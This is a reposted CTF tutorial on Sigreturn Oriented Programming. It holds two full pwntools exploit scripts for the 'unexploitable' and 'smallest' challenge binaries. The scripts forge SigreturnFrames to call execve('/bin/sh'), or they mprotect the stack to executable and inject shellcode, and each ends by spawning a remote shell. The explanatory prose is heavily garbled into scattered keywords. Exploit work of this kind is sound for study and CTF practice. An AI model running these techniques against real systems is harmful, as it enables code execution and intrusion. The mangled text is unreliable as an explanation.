[19522] 2019-08-27_Essential CTF Skills | Linux Pwn Beginner Tutorial: SROP

Document creator: s7ckTeam
Views: 8
Last updated: 2025-01-18
CTF Linux Pwn SROP i 2019-08-27 Linux Pwn i Pwn Linux Pwn i386/amd64 Linux Pwn Pwn Docker python i Linux Pwn SROP 1 001 SROP ROP amd64 ROP gadgets gadgets ROP use SROP ROP SROP (Sigreturn Oriented Programming) Unix Signal Linux 1 signal 2 () rt_sigreturn Signal Handler rt_sigreturn
3 rt_sigreturn 4 1 rt_sigreturn 2 rt_sigreturn re_sigreturn 1 2 3 4 rip Sigreturn Frame Sigreturn Frame SROP pwntools SigreturnFrame SROP http://docs.pwntools.com/en/stable/rop/srop.html pwntools SigreturnFrame rt_sigreturn rt_sigreturn SigreturnFrame syscall rt_sigreturn 32 i386 32 i386 on amd64 64 32 i386 SignalFrame context.arch = i386 SROP Frame = SigreturnFrame(kernel = i386)
amd64 32 SignalFrame

02 SROP 1

SROP use pwntools SROP SROP ~/pwnable.kr-unexploitable/unexploitable got system write puts libc use ROP gadget syscall ROP gadget syscall gadget gadget ropper [https://github.com/sashs/Ropper] ropper syscall rsi rdi gadget ROP getshell read 0x50f 16 rip SigreturnFrame use SROP getshell getshell sys_execve execve(/bin/sh, 0, 0) /bin/sh\x00 syscall mov edx, 50Fh syscall \x00 context.arch=i386 SROP Frame = SigreturnFrame(kernel = amd64)
SROP read read /bin/sh\x00 rsi gadget rbp rax, rsi rbp read 1 2 3 4 0x60115c call _read leave 0x601174 rip retn ROP /bin/sh\x00 0x60115c 0x601174 rt_sigreturn SigreturnFrame SROP syscall rax=0xf rt_sigreturn read i386/amd64 eax/rax read 15 retn syscall payload

syscall_addr = 0x400560
set_read_addr = 0x40055b
read_addr = 0x400571
fake_stack_addr = 0x60116c
fake_ebp_addr = 0x60116c
binsh_addr = 0x60115c
io = remote('172.17.0.3', 10001)
payload = ""
payload += 'a'*16  # padding
payload += p64(fake_stack_addr)  # leave stack pivot use rbp 0x60116c, rbp+buf 0x60115c
payload += p64(set_read_addr)  # lea rax, [rbp+buf]; mov edx, 50Fh; mov rsi, rax; mov edi, 0; mov eax, 0; call _read
io.send(payload)

0x601174-0x60115c=0x18, /bin/sh\x00 8 padding a*0x10 a*8 read leave rbp read RBP /bin/sh\x00 SigreturnFrame bss call _read rsi rdi rdx payload 15 /bin/sh\x00 payload 15

io.send('/bin/sh\x00' + ('a')*7)  # 15 0x60115c read rax=0xf

frameExecve = SigreturnFrame()  # SROP Frame
frameExecve.rax = constants.SYS_execve
frameExecve.rdi = binsh_addr
frameExecve.rsi = 0
frameExecve.rdx = 0
frameExecve.rip = syscall_addr
payload = ""
payload += "/bin/sh\x00"  # binsh 0x60115c
payload += 'a'*8  # padding
payload += p64(fake_stack_addr+0x10)  # 0x60116c leave rsp+8+0x18 syscall
payload += p64(read_addr)  # 0x601174 rsi, rdi, rdx read set rax 15
payload += p64(fake_ebp_addr)  # call read leave, rsp fake_stack_addr+0x10+8, 0x60117c
payload += p64(syscall_addr)  # 0x60117c+8 0x601184 syscall call read 15
payload += str(frameExecve)  # SigreturnFrame

use /bin/sh\x00 pwntools+IDA retn syscall syscall rax 0xf F8 RAX SigreturnFrame SROP F9 use io.interactive( ) shell

03 SROP 2

use SROP SROP ~/360ichunqiu 2017-smallest/smallest SROP execve(/bin/sh\x00 0 0) mprotect+shellcode getshell shellcode BSS mprotect use SROP retn shellcode
sys_read 1 rax=1 sys_write buf mov rsp, rsi rsp start read. read use SROP sys_read payload

syscall_addr = 0x4000be
start_addr = 0x4000b0
set_rsi_rdi_addr = 0x4000b8
shellcode = asm(shellcraft.amd64.linux.sh())
io = remote('172.17.0.3', 10001)
payload = ""
payload += p64(start_addr)  # start sys_read rax = 1 sys_write
payload += p64(set_rsi_rdi_addr)  # mov rsi, rsp; mov rdi, rax; syscall; retn sys_write(1, rsp, size)
payload += p64(start_addr)  # start
io.send(payload)
sleep(3)
io.send(payload[8:8+1])  # sys_read rax = 1
stack_addr = u64(io.recv()[8:16]) + 0x100
log.info('stack addr = %#x' %(stack_addr))
frame_read = SigreturnFrame()  # read SROP
frame_read.rax = constants.SYS_read
frame_read.rdi = 0
frame_read.rsi = stack_addr
frame_read.rdx = 0x300
frame_read.rsp = stack_addr  # stack_addr start SROP ret start
frame_read.rip = syscall_addr
payload = ""
payload += p64(start_addr)  # start sys_read rax = 0xf sys_sigreturn
payload += p64(syscall_addr)  # ret syscall SROP SROP
payload += str(frame_read)
io.send(payload)
sleep(3)
io.send(payload[8:8+15])  # sys_read rax = 0xf

payload sleep(3) syscall retn rsp SROP sys_read start use SROP sys_mprotect shellcode RWX

frame_mprotect = SigreturnFrame()  # mprotect SROP mprotect RWX
frame_mprotect.rax = constants.SYS_mprotect
frame_mprotect.rdi = stack_addr & 0xFFFFFFFFFFFFF000
frame_mprotect.rsi = 0x1000
frame_mprotect.rdx = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
frame_mprotect.rsp = stack_addr
frame_mprotect.rip = syscall_addr
payload = ""
payload += p64(start_addr)
payload += p64(syscall_addr)
payload += str(frame_mprotect)
io.send(payload)
sleep(3)
io.send(payload[8:8+15])
sleep(3)

start use ROP shellcode shellcode

payload = ""
payload += p64(stack_addr+0x10)  # ret stack_addr+0x10 shellcode
payload += asm(shellcraft.amd64.linux.sh())
io.send(payload)
sleep(3)
io.interactive()
